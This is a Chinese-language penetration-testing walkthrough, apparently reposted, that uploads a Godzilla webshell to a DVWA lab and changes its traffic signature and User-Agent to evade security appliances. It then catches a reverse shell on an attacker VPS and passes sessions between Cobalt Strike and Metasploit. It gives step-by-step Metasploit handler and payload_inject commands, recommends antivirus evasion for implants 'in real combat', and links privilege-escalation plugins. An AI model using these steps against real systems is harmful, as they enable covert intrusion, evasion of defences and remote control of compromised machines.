环境:
Windows: 192.168.93.3
VPS:x.x.x.x
⼯具:CobaltStrike4.1、MSF、哥斯拉v2.92
实验场景DVWA靶场,通过靶场的上传漏洞位置,上传webshell
然后⽤冰蝎或者其他webshell⼯具连接:
冰蝎下载地址:
https://github.com/rebeyond/Behinder/releases/tag/Behinder_v3.0_Beta_6
我这⾥⽤的上阶段⽐较⽕的哥斯拉,在哥斯拉安装之前,你需要安装jdk1.8的环境。双击Godzilla.jar打开,此时会在同⽬录下⽣成data.db数据库存放数据,同时它⽀持流量加密和修改特征,可以⼀定程度上防⽌被安服设备发现。同时可以⾃⽣成payload,
哥斯拉下载地址:⽬前最新的版本为V2.92
https://github.com/BeichenDream/Godzilla/releases/tag/v2.92-godzilla
个⼈感觉唯⼀缺点就是⻚⾯有点丑。
既然说了可以隐藏特征,那么这⾥我们就伪造⼀下特征:
⾸先wireshark抓包看下 未作修改的数据包是什么样⼦:
先⽣成⼀个payload:点击. ⻚⾯ — 管理 — ⽣成
webs hell有两种加密规则,Raw or Base64 加密
Raw:Raw是将加密后的数据直接发送或者输出
Base64:Base64是将加密后的数据再进⾏Base64编码
然后选择pass是连接密码,payload类型 ,⼀共是三种类型,
这⾥我的webshell⽂件是:1.php。
通过DVWA靶场上传到本地,然后链接shell ,⾥⾯参数⼀定要和我们创建的⼀样。
然后我们测试连接,成功后添加就⾏,
进⼊到操作模式,在命令执⾏处执⾏⼀条命令:dir,同时wireshark开启抓包
然后就是查看包内容:没更改之前是这样的
这⾥⼀些安服设备都会过滤 User-agent(简称UA),所以我们这⾥要根据对⽅的⽹络环境去修改:
添加⽬标处也可以更改,再次抓包发现成功 UA成功修改了。
⾄此webshell⽅⾯基本就不需要我们再去配置什么了,如果为了保险起⻅可以在对webshell进⾏⼀定的隐蔽。
接下来就是CS、MSF上线。
这⾥他有⾃带的反弹shell⼯具 ;先尝试能否成功,打开我们的VPS 机的MSF 按照他的配置进⾏配置 ,然后 run 开始监听 10086端⼝观测 VPS动态,发现成功反弹shell。
这⾥ MSF已经上线,我们现在要让CS 也上线,
这⾥发现⼀个问题,脚本shell的权限很不稳,MSF权限经常会丢失,所以还是建议直接上传CS⻢或者通过其他⽅式上线CS。这⾥上传CS⻢⽅式,实战中注意免杀。
通过webshell⼯具的⽂件上传到本地机器⽬录。然后运⾏上线直接管理员权限,都省着我提权了,这⾥推荐⼏个提权CS插件:
https://github.com/timwhitez/Cobalt-Strike-Aggressor-Scripts
https://github.com/zer0yu/Awesome-CobaltStrike
尝试把CS会话在MSF端上线
当CobaltStrike获得了⼀个上线机器,想把这个⽬标传给Metasploit中的meterpreter,获得⼀个session进⾏控制。在Metasploit执⾏以下命令:
MSF:
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost vps:IP
set lport 10010
exploit -j #-j 后台监听 可不选
CS:
⾸先有⼀个已经建⽴会话的shell,然后添加监听器Listener,HOST和PORT填写msf监听的地址IP:x.x.x.x,PORT:10010
选择我们刚才建⽴的 listener ,然后等待MSF端,过程⼤概1-2分钟
MSF会话反弹给CS:
这⾥只是为了实验,所以就⽤这个CS反弹来的shell,实际中请结合具体内⽹情况。
CS适合外围突破,MSF适合内⽹横向,当然也看个⼈喜好
1、⾸先把msf上获取到的meterpreter挂在后台运⾏
Background #就是返回的意思
CS :创建⼀个监听,payload⽅式要与MSF相同即可。
MSF:
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set disablepayloadhandler true
#默认情况下,payload_inject执⾏之后会在本地产⽣⼀个新的handler,由于我们已经有了⼀个,所以
不需要在产⽣⼀个,所以这⾥我们设置为true
set lhost x.x.x.x #cobaltstrike监听的ip
set lport 10001 #cobaltstrike监听的端⼝
set session 1 #这⾥是获得的session的id
exploit
然后正常情况下 等待上线即可,我这⾥不做演示了,因为 VPS卡死了。。。
转自:ms08067